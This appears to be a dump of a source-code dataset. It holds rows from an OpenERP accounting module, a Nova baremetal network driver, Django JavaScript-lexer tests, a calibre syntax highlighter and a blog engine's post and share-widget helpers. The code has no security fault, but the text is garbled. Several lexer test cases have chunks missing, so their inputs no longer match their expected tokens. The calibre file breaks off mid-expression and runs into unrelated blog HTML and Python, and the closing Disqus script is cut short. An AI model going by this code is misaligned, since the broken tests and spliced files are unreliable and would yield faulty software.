not account_obj.read(cr, uid, vals['account_id'], ['active'])['active']:\n raise osv.except_osv(_('Bad Account!'), _('You cannot use an inactive account.'))\n if update_check:\n if ('account_id' in vals) or ('journal_id' in vals) or ('period_id' in vals) or ('move_id' in vals) or ('debit' in vals) or ('credit' in vals) or ('date' in vals):\n self._update_check(cr, uid, ids, context)\n\n todo_date = None\n if vals.get('date', False):\n todo_date = vals['date']\n del vals['date']\n\n for line in self.browse(cr, uid, ids, context=context):\n ctx = context.copy()\n if not ctx.get('journal_id'):\n if line.move_id:\n ctx['journal_id'] = line.move_id.journal_id.id\n else:\n ctx['journal_id'] = line.journal_id.id\n if not ctx.get('period_id'):\n if line.move_id:\n ctx['period_id'] = line.move_id.period_id.id\n else:\n ctx['period_id'] = line.period_id.id\n #Check for centralisation\n journal = journal_obj.browse(cr, uid, ctx['journal_id'], context=ctx)\n if journal.centralisation:\n self._check_moves(cr, uid, context=ctx)\n result = super(account_move_line, self).write(cr, uid, ids, vals, context)\n if check:\n done = []\n for line in self.browse(cr, uid, ids):\n if line.move_id.id not in done:\n done.append(line.move_id.id)\n move_obj.validate(cr, uid, [line.move_id.id], context)\n if todo_date:\n move_obj.write(cr, uid, [line.move_id.id], {'date': todo_date}, context=context)\n return result\n\n def _update_journal_check(self, cr, uid, journal_id, period_id, context=None):\n journal_obj = self.pool.get('account.journal')\n period_obj = self.pool.get('account.period')\n jour_period_obj = self.pool.get('account.journal.period')\n cr.execute('SELECT state FROM account_journal_period WHERE journal_id = %s AND period_id = %s', (journal_id, period_id))\n result = cr.fetchall()\n journal = journal_obj.browse(cr, uid, journal_id, context=context)\n period = period_obj.browse(cr, uid, period_id, context=context)\n for (state,) in result:\n if state == 'done':\n raise osv.except_osv(_('Error!'), _('You can not add/modify entries in a closed period %s of journal %s.' % (period.name,journal.name)))\n if not result:\n jour_period_obj.create(cr, uid, {\n 'name': (journal.code or journal.name)+':'+(period.name or ''),\n 'journal_id': journal.id,\n 'period_id': period.id\n })\n return True\n\n def _update_check(self, cr, uid, ids, context=None):\n done = {}\n for line in self.browse(cr, uid, ids, context=context):\n err_msg = _('Move name (id): %s (%s)') % (line.move_id.name, str(line.move_id.id))\n if line.move_id.state <> 'draft' and (not line.journal_id.entry_posted):\n raise osv.except_osv(_('Error!'), _('You cannot do this modification on a confirmed entry. You can just change some non legal fields or you must unconfirm the journal entry first.\\n%s.') % err_msg)\n if line.reconcile_id:\n raise osv.except_osv(_('Error!'), _('You cannot do this modification on a reconciled entry. You can just change some non legal fields or you must unreconcile first.\\n%s.') % err_msg)\n t = (line.journal_id.id, line.period_id.id)\n if t not in done:\n self._update_journal_check(cr, uid, line.journal_id.id, line.period_id.id, context)\n done[t] = True\n return True\n\n def create(self, cr, uid, vals, context=None, check=True):\n account_obj = self.pool.get('account.account')\n tax_obj = self.pool.get('account.tax')\n move_obj = self.pool.get('account.move')\n cur_obj = self.pool.get('res.currency')\n journal_obj = self.pool.get('account.journal')\n context = dict(context or {})\n if vals.get('move_id', False):\n move = self.pool.get('account.move').browse(cr, uid, vals['move_id'], context=context)\n if move.company_id:\n vals['company_id'] = move.company_id.id\n if move.date and not vals.get('date'):\n vals['date'] = move.date\n if ('account_id' in vals) and not account_obj.read(cr, uid, [vals['account_id']], ['active'])[0]['active']:\n raise osv.except_osv(_('Bad Account!'), _('You cannot use an inactive account.'))\n if 'journal_id' in vals and vals['journal_id']:\n context['journal_id'] = vals['journal_id']\n if 'period_id' in vals and vals['period_id']:\n context['period_id'] = vals['period_id']\n if ('journal_id' not in context) and ('move_id' in vals) and vals['move_id']:\n m = move_obj.browse(cr, uid, vals['move_id'])\n context['journal_id'] = m.journal_id.id\n context['period_id'] = m.period_id.id\n #we need to treat the case where a value is given in the context for period_id as a string\n if 'period_id' in context and not isinstance(context.get('period_id', ''), (int, long)):\n period_candidate_ids = self.pool.get('account.period').name_search(cr, uid, name=context.get('period_id',''))\n if len(period_candidate_ids) != 1:\n raise osv.except_osv(_('Error!'), _('No period found or more than one period found for the given date.'))\n context['period_id'] = period_candidate_ids[0][0]\n if not context.get('journal_id', False) and context.get('search_default_journal_id', False):\n context['journal_id'] = context.get('search_default_journal_id')\n self._update_journal_check(cr, uid, context['journal_id'], context['period_id'], context)\n move_id = vals.get('move_id', False)\n journal = journal_obj.browse(cr, uid, context['journal_id'], context=context)\n vals['journal_id'] = vals.get('journal_id') or context.get('journal_id')\n vals['period_id'] = vals.get('period_id') or context.get('period_id')\n vals['date'] = vals.get('date') or context.get('date')\n if not move_id:\n if journal.centralisation:\n #Check for centralisation\n res = self._check_moves(cr, uid, context)\n if res:\n vals['move_id'] = res[0]\n if not vals.get('move_id', False):\n if journal.sequence_id:\n #name = self.pool.get('ir.sequence').next_by_id(cr, uid, journal.sequence_id.id)\n v = {\n 'date': vals.get('date', time.strftime('%Y-%m-%d')),\n 'period_id': context['period_id'],\n 'journal_id': context['journal_id']\n }\n if vals.get('ref', ''):\n v.update({'ref': vals['ref']})\n move_id = move_obj.create(cr, uid, v, context)\n vals['move_id'] = move_id\n else:\n raise osv.except_osv(_('No Piece Number!'), _('Cannot create an automatic sequence for this piece.\\nPut a sequence in the journal definition for automatic numbering or create a sequence manually for this piece.'))\n ok = not (journal.type_control_ids or journal.account_control_ids)\n if ('account_id' in vals):\n account = account_obj.browse(cr, uid, vals['account_id'], context=context)\n if journal.type_control_ids:\n type = account.user_type\n for t in journal.type_control_ids:\n if type.code == t.code:\n ok = True\n break\n if journal.account_control_ids and not ok:\n for a in journal.account_control_ids:\n if a.id == vals['account_id']:\n ok = True\n break\n # Automatically convert in the account's secondary currency if there is one and\n # the provided values were not already multi-currency\n if account.currency_id and 'amount_currency' not in vals and account.currency_id.id != account.company_id.currency_id.id:\n vals['currency_id'] = account.currency_id.id\n ctx = {}\n if 'date' in vals:\n ctx['date'] = vals['date']\n vals['amount_currency'] = cur_obj.compute(cr, uid, account.company_id.currency_id.id,\n account.currency_id.id, vals.get('debit', 0.0)-vals.get('credit', 0.0), context=ctx)\n if not ok:\n raise osv.except_osv(_('Bad Account!'), _('You cannot use this general account in this journal, check the tab \\'Entry Controls\\' on the related journal.'))\n\n result = super(account_move_line, self).create(cr, uid, vals, context=context)\n # CREATE Taxes\n if vals.get('account_tax_id', False):\n tax_id = tax_obj.browse(cr, uid, vals['account_tax_id'])\n total = vals['debit'] - vals['credit']\n base_code = 'base_code_id'\n tax_code = 'tax_code_id'\n account_id = 'account_collected_id'\n base_sign = 'base_sign'\n tax_sign = 'tax_sign'\n if journal.type in ('purchase_refund', 'sale_refund') or (journal.type in ('cash', 'bank') and total < 0):\n base_code = 'ref_base_code_id'\n tax_code = 'ref_tax_code_id'\n account_id = 'account_paid_id'\n base_sign = 'ref_base_sign'\n tax_sign = 'ref_tax_sign'\n tmp_cnt = 0\n for tax in tax_obj.compute_all(cr, uid, [tax_id], total, 1.00, force_excluded=False).get('taxes'):\n #create the base movement\n if tmp_cnt == 0:\n if tax[base_code]:\n tmp_cnt += 1\n if tax_id.price_include:\n total = tax['price_unit']\n newvals = {\n 'tax_code_id': tax[base_code],\n 'tax_amount': tax[base_sign] * abs(total),\n }\n if tax_id.price_include:\n if tax['price_unit'] < 0:\n newvals['credit'] = abs(tax['price_unit'])\n else:\n newvals['debit'] = tax['price_unit']\n self.write(cr, uid, [result], newvals, context=context)\n else:\n data = {\n 'move_id': vals['move_id'],\n 'name': tools.ustr(vals['name'] or '') + ' ' + tools.ustr(tax['name'] or ''),\n 'date': vals['date'],\n 'partner_id': vals.get('partner_id', False),\n 'ref': vals.get('ref', False),\n 'statement_id': vals.get('statement_id', False),\n 'account_tax_id': False,\n 'tax_code_id': tax[base_code],\n 'tax_amount': tax[base_sign] * abs(total),\n 'account_id': vals['account_id'],\n 'credit': 0.0,\n 'debit': 0.0,\n }\n if data['tax_code_id']:\n self.create(cr, uid, data, context)\n #create the Tax movement\n data = {\n 'move_id': vals['move_id'],\n 'name': tools.ustr(vals['name'] or '') + ' ' + tools.ustr(tax['name'] or ''),\n 'date': vals['date'],\n 'partner_id': vals.get('partner_id',False),\n 'ref': vals.get('ref',False),\n 'statement_id': vals.get('statement_id', False),\n 'account_tax_id': False,\n 'tax_code_id': tax[tax_code],\n 'tax_amount': tax[tax_sign] * abs(tax['amount']),\n 'account_id': tax[account_id] or vals['account_id'],\n 'credit': tax['amount']<0 and -tax['amount'] or 0.0,\n 'debit': tax['amount']>0 and tax['amount'] or 0.0,\n }\n if data['tax_code_id']:\n self.create(cr, uid, data, context)\n del vals['account_tax_id']\n\n if check and not context.get('novalidate') and (context.get('recompute', True) or journal.entry_posted):\n tmp = move_obj.validate(cr, uid, [vals['move_id']], context)\n if journal.entry_posted and tmp:\n move_obj.button_validate(cr,uid, [vals['move_id']], context)\n return result\n\n def list_periods(self, cr, uid, context=None):\n ids = self.pool.get('account.period').search(cr,uid,[])\n return self.pool.get('account.period').name_get(cr, uid, ids, context=context)\n\n def list_journals(self, cr, uid, context=None):\n ng = dict(self.pool.get('account.journal').name_search(cr,uid,'',[]))\n ids = ng.keys()\n result = []\n for journal in self.pool.get('account.journal').browse(cr, uid, ids, context=context):\n result.append((journal.id,ng[journal.id],journal.type,\n bool(journal.currency),bool(journal.analytic_journal_id)))\n return result\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2479,"cells":{"repo_name":{"kind":"string","value":"fajoy/nova"},"path":{"kind":"string","value":"nova/virt/baremetal/vif_driver.py"},"copies":{"kind":"string","value":"2"},"size":{"kind":"string","value":"3058"},"content":{"kind":"string","value":"# Copyright (c) 2012 NTT DOCOMO, INC.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom nova import context\nfrom nova import exception\nfrom nova.openstack.common import cfg\nfrom nova.openstack.common import log as logging\nfrom nova.virt.baremetal import db as bmdb\n\nCONF = cfg.CONF\n\nLOG = logging.getLogger(__name__)\n\n\nclass BareMetalVIFDriver(object):\n\n def _after_plug(self, instance, network, mapping, pif):\n pass\n\n def _after_unplug(self, instance, network, mapping, pif):\n pass\n\n def plug(self, instance, vif):\n LOG.debug(_(\"plug: instance_uuid=%(uuid)s vif=%(vif)s\")\n % {'uuid': instance['uuid'], 'vif': vif})\n network, mapping = vif\n vif_uuid = mapping['vif_uuid']\n ctx = context.get_admin_context()\n node = bmdb.bm_node_get_by_instance_uuid(ctx, instance['uuid'])\n\n # TODO(deva): optimize this database query\n # this is just searching for a free physical interface\n pifs = bmdb.bm_interface_get_all_by_bm_node_id(ctx, node['id'])\n for pif in pifs:\n if not pif['vif_uuid']:\n bmdb.bm_interface_set_vif_uuid(ctx, pif['id'], vif_uuid)\n LOG.debug(_(\"pif:%(id)s is plugged (vif_uuid=%(vif_uuid)s)\")\n % {'id': pif['id'], 'vif_uuid': vif_uuid})\n self._after_plug(instance, network, mapping, pif)\n return\n\n # NOTE(deva): should this really be raising an exception\n # when there are no physical interfaces left?\n raise exception.NovaException(_(\n \"Baremetal node: %(id)s has no available physical interface\"\n \" for virtual interface %(vif_uuid)s\")\n % {'id': node['id'], 'vif_uuid': vif_uuid})\n\n def unplug(self, instance, vif):\n LOG.debug(_(\"unplug: instance_uuid=%(uuid)s vif=%(vif)s\"),\n {'uuid': instance['uuid'], 'vif': vif})\n network, mapping = vif\n vif_uuid = mapping['vif_uuid']\n ctx = context.get_admin_context()\n try:\n pif = bmdb.bm_interface_get_by_vif_uuid(ctx, vif_uuid)\n bmdb.bm_interface_set_vif_uuid(ctx, pif['id'], None)\n LOG.debug(_(\"pif:%(id)s is unplugged (vif_uuid=%(vif_uuid)s)\")\n % {'id': pif['id'], 'vif_uuid': vif_uuid})\n self._after_unplug(instance, network, mapping, pif)\n except exception.NovaException:\n LOG.warn(_(\"no pif for vif_uuid=%s\") % vif_uuid)\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2480,"cells":{"repo_name":{"kind":"string","value":"Batterfii/django"},"path":{"kind":"string","value":"tests/utils_tests/test_jslex.py"},"copies":{"kind":"string","value":"153"},"size":{"kind":"string","value":"9837"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\"\"\"Tests for jslex.\"\"\"\n# originally from https://bitbucket.org/ned/jslex\nfrom __future__ import unicode_literals\n\nfrom django.test import SimpleTestCase\nfrom django.utils.jslex import JsLexer, prepare_js_for_gettext\n\n\nclass JsTokensTest(SimpleTestCase):\n LEX_CASES = [\n # ids\n (\"a ABC $ _ a123\", [\"id a\", \"id ABC\", \"id $\", \"id _\", \"id a123\"]),\n (\"\\\\u1234 abc\\\\u0020 \\\\u0065_\\\\u0067\", [\"id \\\\u1234\", \"id abc\\\\u0020\", \"id \\\\u0065_\\\\u0067\"]),\n # numbers\n (\"123 1.234 0.123e-3 0 1E+40 1e1 .123\", [\n \"dnum 123\", \"dnum 1.234\", \"dnum 0.123e-3\", \"dnum 0\", \"dnum 1E+40\",\n \"dnum 1e1\", \"dnum .123\",\n ]),\n (\"0x1 0xabCD 0XABcd\", [\"hnum 0x1\", \"hnum 0xabCD\", \"hnum 0XABcd\"]),\n (\"010 0377 090\", [\"onum 010\", \"onum 0377\", \"dnum 0\", \"dnum 90\"]),\n (\"0xa123ghi\", [\"hnum 0xa123\", \"id ghi\"]),\n # keywords\n (\"function Function FUNCTION\", [\"keyword function\", \"id Function\", \"id FUNCTION\"]),\n (\"const constructor in inherits\", [\"keyword const\", \"id constructor\", \"keyword in\", \"id inherits\"]),\n (\"true true_enough\", [\"reserved true\", \"id true_enough\"]),\n # strings\n (''' 'hello' \"hello\" ''', [\"string 'hello'\", 'string \"hello\"']),\n (r\"\"\" 'don\\'t' \"don\\\"t\" '\"' \"'\" '\\'' \"\\\"\" \"\"\", [\n r\"\"\"string 'don\\'t'\"\"\", r'''string \"don\\\"t\"''', r\"\"\"string '\"'\"\"\",\n r'''string \"'\"''', r\"\"\"string '\\''\"\"\", r'''string \"\\\"\"'''\n ]),\n (r'\"ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\\\"\"', [r'string \"ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\\\"\"']),\n # comments\n (\"a//b\", [\"id a\", \"linecomment //b\"]),\n (\"/****/a/=2//hello\", [\"comment /****/\", \"id a\", \"punct /=\", \"dnum 2\", \"linecomment //hello\"]),\n (\"/*\\n * Header\\n */\\na=1;\", [\"comment /*\\n * Header\\n */\", \"id a\", \"punct =\", \"dnum 1\", \"punct ;\"]),\n # punctuation\n (\"a+++b\", [\"id a\", \"punct ++\", \"punct +\", \"id b\"]),\n # regex\n (r\"a=/a*/,1\", [\"id a\", \"punct =\", \"regex /a*/\", \"punct ,\", \"dnum 1\"]),\n (r\"a=/a*[^/]+/,1\", [\"id a\", \"punct =\", \"regex /a*[^/]+/\", \"punct ,\", \"dnum 1\"]),\n (r\"a=/a*\\[^/,1\", [\"id a\", \"punct =\", r\"regex /a*\\[^/\", \"punct ,\", \"dnum 1\"]),\n (r\"a=/\\//,1\", [\"id a\", \"punct =\", r\"regex /\\//\", \"punct ,\", \"dnum 1\"]),\n\n # next two are from http://www.mozilla.org/js/language/js20-2002-04/rationale/syntax.html#regular-expressions\n (\"\"\"for (var x = a in foo && \"\" || mot ? z:/x:3;x<5;y\"', \"punct ||\", \"id mot\", \"punct ?\", \"id z\",\n \"punct :\", \"regex /x:3;x<5;y\" || mot ? z/x:3;x<5;y\"', \"punct ||\", \"id mot\", \"punct ?\", \"id z\",\n \"punct /\", \"id x\", \"punct :\", \"dnum 3\", \"punct ;\", \"id x\", \"punct <\", \"dnum 5\",\n \"punct ;\", \"id y\", \"punct <\", \"regex /g/i\", \"punct )\", \"punct {\",\n \"id xyz\", \"punct (\", \"id x\", \"punct ++\", \"punct )\", \"punct ;\", \"punct }\"]),\n\n # Various \"illegal\" regexes that are valid according to the std.\n (r\"\"\"/????/, /++++/, /[----]/ \"\"\", [\"regex /????/\", \"punct ,\", \"regex /++++/\", \"punct ,\", \"regex /[----]/\"]),\n\n # Stress cases from http://stackoverflow.com/questions/5533925/what-javascript-constructs-does-jslex-incorrectly-lex/5573409#5573409 # NOQA\n (r\"\"\"/\\[/\"\"\", [r\"\"\"regex /\\[/\"\"\"]),\n (r\"\"\"/[i]/\"\"\", [r\"\"\"regex /[i]/\"\"\"]),\n (r\"\"\"/[\\]]/\"\"\", [r\"\"\"regex /[\\]]/\"\"\"]),\n (r\"\"\"/a[\\]]/\"\"\", [r\"\"\"regex /a[\\]]/\"\"\"]),\n (r\"\"\"/a[\\]]b/\"\"\", [r\"\"\"regex /a[\\]]b/\"\"\"]),\n (r\"\"\"/[\\]/]/gi\"\"\", [r\"\"\"regex /[\\]/]/gi\"\"\"]),\n (r\"\"\"/\\[[^\\]]+\\]/gi\"\"\", [r\"\"\"regex /\\[[^\\]]+\\]/gi\"\"\"]),\n (\"\"\"\n rexl.re = {\n NAME: /^(?![0-9])(?:\\w)+|^\"(?:[^\"]|\"\")+\"/,\n UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\\w|\\:)+|^\"(?:[^\"]|\"\")+\")\\[[^\\]]+\\]/,\n QUOTED_LITERAL: /^'(?:[^']|'')*'/,\n NUMERIC_LITERAL: /^[0-9]+(?:\\.[0-9]*(?:[eE][-+][0-9]+)?)?/,\n SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\\||\\.|\\:|,|\\(|\\)|\\[|\\]|\\{|\\}|\\?|\\:|;|@|\\^|\\/\\+|\\/|\\*|\\+|-)/\n };\n \"\"\", # NOQA\n [\"id rexl\", \"punct .\", \"id re\", \"punct =\", \"punct {\",\n \"id NAME\", \"punct :\", r\"\"\"regex /^(?![0-9])(?:\\w)+|^\"(?:[^\"]|\"\")+\"/\"\"\", \"punct ,\",\n \"id UNQUOTED_LITERAL\", \"punct :\", r\"\"\"regex /^@(?:(?![0-9])(?:\\w|\\:)+|^\"(?:[^\"]|\"\")+\")\\[[^\\]]+\\]/\"\"\",\n \"punct ,\",\n \"id QUOTED_LITERAL\", \"punct :\", r\"\"\"regex /^'(?:[^']|'')*'/\"\"\", \"punct ,\",\n \"id NUMERIC_LITERAL\", \"punct :\", r\"\"\"regex /^[0-9]+(?:\\.[0-9]*(?:[eE][-+][0-9]+)?)?/\"\"\", \"punct ,\",\n \"id SYMBOL\", \"punct :\", r\"\"\"regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\\||\\.|\\:|,|\\(|\\)|\\[|\\]|\\{|\\}|\\?|\\:|;|@|\\^|\\/\\+|\\/|\\*|\\+|-)/\"\"\", # NOQA\n \"punct }\", \"punct ;\"\n ]),\n\n (\"\"\"\n rexl.re = {\n NAME: /^(?![0-9])(?:\\w)+|^\"(?:[^\"]|\"\")+\"/,\n UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\\w|\\:)+|^\"(?:[^\"]|\"\")+\")\\[[^\\]]+\\]/,\n QUOTED_LITERAL: /^'(?:[^']|'')*'/,\n NUMERIC_LITERAL: /^[0-9]+(?:\\.[0-9]*(?:[eE][-+][0-9]+)?)?/,\n SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\\||\\.|\\:|,|\\(|\\)|\\[|\\]|\\{|\\}|\\?|\\:|;|@|\\^|\\/\\+|\\/|\\*|\\+|-)/\n };\n str = '\"';\n \"\"\", # NOQA\n [\"id rexl\", \"punct .\", \"id re\", \"punct =\", \"punct {\",\n \"id NAME\", \"punct :\", r\"\"\"regex /^(?![0-9])(?:\\w)+|^\"(?:[^\"]|\"\")+\"/\"\"\", \"punct ,\",\n \"id UNQUOTED_LITERAL\", \"punct :\", r\"\"\"regex /^@(?:(?![0-9])(?:\\w|\\:)+|^\"(?:[^\"]|\"\")+\")\\[[^\\]]+\\]/\"\"\",\n \"punct ,\",\n \"id QUOTED_LITERAL\", \"punct :\", r\"\"\"regex /^'(?:[^']|'')*'/\"\"\", \"punct ,\",\n \"id NUMERIC_LITERAL\", \"punct :\", r\"\"\"regex /^[0-9]+(?:\\.[0-9]*(?:[eE][-+][0-9]+)?)?/\"\"\", \"punct ,\",\n \"id SYMBOL\", \"punct :\", r\"\"\"regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\\||\\.|\\:|,|\\(|\\)|\\[|\\]|\\{|\\}|\\?|\\:|;|@|\\^|\\/\\+|\\/|\\*|\\+|-)/\"\"\", # NOQA\n \"punct }\", \"punct ;\",\n \"id str\", \"punct =\", \"\"\"string '\"'\"\"\", \"punct ;\",\n ]),\n\n (r\"\"\" this._js = \"e.str(\\\"\" + this.value.replace(/\\\\/g, \"\\\\\\\\\").replace(/\"/g, \"\\\\\\\"\") + \"\\\")\"; \"\"\",\n [\"keyword this\", \"punct .\", \"id _js\", \"punct =\", r'''string \"e.str(\\\"\"''', \"punct +\", \"keyword this\",\n \"punct .\", \"id value\", \"punct .\", \"id replace\", \"punct (\", r\"regex /\\\\/g\", \"punct ,\", r'string \"\\\\\\\\\"',\n \"punct )\",\n \"punct .\", \"id replace\", \"punct (\", r'regex /\"/g', \"punct ,\", r'string \"\\\\\\\"\"', \"punct )\", \"punct +\",\n r'string \"\\\")\"', \"punct ;\"]),\n ]\n\n\ndef make_function(input, toks):\n def test_func(self):\n lexer = JsLexer()\n result = [\"%s %s\" % (name, tok) for name, tok in lexer.lex(input) if name != 'ws']\n self.assertListEqual(result, toks)\n return test_func\n\nfor i, (input, toks) in enumerate(JsTokensTest.LEX_CASES):\n setattr(JsTokensTest, \"test_case_%d\" % i, make_function(input, toks))\n\n\nGETTEXT_CASES = (\n (\n r\"\"\"\n a = 1; /* /[0-9]+/ */\n b = 0x2a0b / 1; // /[0-9]+/\n c = 3;\n \"\"\",\n r\"\"\"\n a = 1; /* /[0-9]+/ */\n b = 0x2a0b / 1; // /[0-9]+/\n c = 3;\n \"\"\"\n ), (\n r\"\"\"\n a = 1.234e-5;\n /*\n * /[0-9+/\n */\n b = .0123;\n \"\"\",\n r\"\"\"\n a = 1.234e-5;\n /*\n * /[0-9+/\n */\n b = .0123;\n \"\"\"\n ), (\n r\"\"\"\n x = y / z;\n alert(gettext(\"hello\"));\n x /= 3;\n \"\"\",\n r\"\"\"\n x = y / z;\n alert(gettext(\"hello\"));\n x /= 3;\n \"\"\"\n ), (\n r\"\"\"\n s = \"Hello \\\"th/foo/ere\\\"\";\n s = 'He\\x23llo \\'th/foo/ere\\'';\n s = 'slash quote \\\", just quote \"';\n \"\"\",\n r\"\"\"\n s = \"Hello \\\"th/foo/ere\\\"\";\n s = \"He\\x23llo \\'th/foo/ere\\'\";\n s = \"slash quote \\\", just quote \\\"\";\n \"\"\"\n ), (\n r\"\"\"\n s = \"Line continuation\\\n continued /hello/ still the string\";/hello/;\n \"\"\",\n r\"\"\"\n s = \"Line continuation\\\n continued /hello/ still the string\";\"REGEX\";\n \"\"\"\n ), (\n r\"\"\"\n var regex = /pattern/;\n var regex2 = /matter/gm;\n var regex3 = /[*/]+/gm.foo(\"hey\");\n \"\"\",\n r\"\"\"\n var regex = \"REGEX\";\n var regex2 = \"REGEX\";\n var regex3 = \"REGEX\".foo(\"hey\");\n \"\"\"\n ), (\n r\"\"\"\n for (var x = a in foo && \"\" || mot ? z:/x:3;x<5;y\" || mot ? z/x:3;x<5;y\" || mot ? z:\"REGEX\"/i) {xyz(x++);}\n for (var x = a in foo && \"\" || mot ? z/x:3;x<5;y<\"REGEX\") {xyz(x++);}\n \"\"\"\n ), (\n \"\"\"\n \\\\u1234xyz = gettext('Hello there');\n \"\"\", r\"\"\"\n Uu1234xyz = gettext(\"Hello there\");\n \"\"\"\n )\n)\n\n\nclass JsToCForGettextTest(SimpleTestCase):\n pass\n\n\ndef make_function(js, c):\n def test_func(self):\n self.assertMultiLineEqual(prepare_js_for_gettext(js), c)\n return test_func\n\nfor i, pair in enumerate(GETTEXT_CASES):\n setattr(JsToCForGettextTest, \"test_case_%d\" % i, make_function(*pair))\n"},"license":{"kind":"string","value":"bsd-3-clause"}}},{"rowIdx":2481,"cells":{"repo_name":{"kind":"string","value":"ashang/calibre"},"path":{"kind":"string","value":"src/calibre/gui2/tweak_book/editor/syntax/javascript.py"},"copies":{"kind":"string","value":"14"},"size":{"kind":"string","value":"3917"},"content":{"kind":"string","value":"#!/usr/bin/env python2\n# vim:fileencoding=utf-8\nfrom __future__ import (unicode_literals, division, absolute_import,\n print_function)\n\n__license__ = 'GPL v3'\n__copyright__ = '2014, Kovid Goyal '\n\nimport re\n\nfrom pygments.lexer import RegexLexer, default, include\nfrom pygments.token import Comment, Punctuation, Number, Keyword, Text, String, Operator, Name\nimport pygments.unistring as uni\n\nfrom calibre.gui2.tweak_book.editor.syntax.pygments_highlighter import create_highlighter\n\nJS_IDENT_START = ('(?:[$_' + uni.combine('Lu', 'Ll', 'Lt', 'Lm', 'Lo', 'Nl') +\n ']|\\\\\\\\u[a-fA-F0-9]{4})')\nJS_IDENT_PART = ('(?:[$' + uni.combine('Lu', 'Ll', 'Lt', 'Lm', 'Lo', 'Nl',\n 'Mn', 'Mc', 'Nd', 'Pc') +\n u'\\u200c\\u200d]|\\\\\\\\u[a-fA-F0-9]{4})')\nJS_IDENT = JS_IDENT_START + '(?:' + JS_IDENT_PART + ')*'\n\nclass JavascriptLexer(RegexLexer):\n\n \"\"\"\n For JavaScript source code. This is based on the pygments JS highlighter,\n bu that does not handle multi-line comments in streaming mode, so we had to\n modify it.\n \"\"\"\n\n flags = re.UNICODE | re.MULTILINE\n\n tokens = {\n b'commentsandwhitespace': [\n (r'\\s+', Text),\n (r'\n
\n Share\n |\n \n \n \n \n
\n \n ''' % {'username': config.addthis_user, 'url': addthis_url, 'title': addthis_title, 'description': addthis_description}\n return addthis\n\n\n\n\n def post_meta(self, post):\n \n \n T = self.i2p.environment.T\n request = self.i2p.environment.request\n config = self.i2p.config\n articles = self.i2p.articles\n users = self.i2p.users\n \n \n post_author_caption = '%s' \\\n % users.get_user_title(post.created_by_id) \n post_category = articles.get_post_category(post.id)\n \n if post_category==\"\":\n post_category = T(\"uncategorized\")\n in_category = T('in')\n else:\n in_category = T('in categories')\n \n #post_time = post.published_on.strftime(\"%B %d, %Y at %I:%M\")\n post_time = post.published_on.strftime(\"%Y-%m-%d %I:%M\")\n year_full = post.published_on.strftime(\"%Y\") \n month = post.published_on.strftime(\"%m\")\n link_time = A(post_time, _href=URL(request.application,\\\n config.controller_default,\\\n 'archives',args=[year_full,month]))\n posted_by = T('By')\n \n updated_on = T('Published on') \n byline = '%s %s %s %s %s %s' % (updated_on, link_time.xml(), posted_by, \\\n post_author_caption, in_category, post_category)\n \n return byline\n\n\n\n\n def post_extract(self, post):\n \n config = self.i2p.config\n T = self.i2p.environment.T\n request = self.i2p.environment.request\n comments = self.i2p.comments\n articles = self.i2p.articles\n \n \n label_comments = \"%s\" % T('Comments')\n if config.comments_method in ['Enabled'] and not config.widgets_ajax:\n comments_count = comments._get_comment_count(post.id) \n elif config.comments_method in ['Disqus']:\n comments_count = \"\"\n else:\n comments_count = 0\n \n if config.comments_method in ['Disqus']:\n link_comments = articles.get_post_permanent_link(post.id, \\\n 'Comments', \\\n 'disqus_thread')\n else: \n link_comments = articles.get_post_permanent_link(post.id, \\\n label_comments, \\\n 'comments') \n \n link_readmore = articles.get_post_permanent_link(post.id, T(\"Read more\"))\n base_http = 'http://' + str(request.env.http_host)\n url_permanent = articles.get_post_permanent_link(post.id, only_url=True )\n url_post = str(base_http + url_permanent)\n \n if config.addthis_enabled:\n #add_this = self.add_this(url_post,post.title,post.text_slice[:100]) #need to pass: title, url, description \n add_this = self.add_this(url_permanent,post.title,post.text_slice[:100]) #need to pass: title, url, description\n else:\n add_this = \"\"\n \n xml_post = '
'\n xml_post +='

%s

' \\\n % articles.get_post_permanent_link(post.id).xml()\n xml_post +='''
%s - \n %s \n %s \n
''' \\\n % (self.post_meta(post), post.id, comments_count, link_comments.xml()) \n \n if config.editor_language in ['Markmin']:\n text_slice = MARKMIN(post.text_slice)\n else:\n text_slice = post.text_slice \n \n xml_post +='
%s
' % text_slice \n xml_post +='''
\n
%s
\n
%s
\n
\n
''' % (link_readmore.xml(), add_this) \n xml_post +='
'\n \n return xml_post\n \n\n\n\n def last_posts(self, page):\n \n articles = self.i2p.articles \n (posts, count_posts) = articles.get_last_posts(page) \n xml_posts = articles.get_xml_results_from_posts(posts)\n xml_posts += articles.pagination_last_post(page, count_posts) \n return xml_posts\n\n\n\n def disqus_comments(self):\n \n config = self.i2p.config\n \n if config.disqus_dev:\n developer = 'var disqus_developer = 1;';\n else:\n developer = '';\n \n script = '''\n
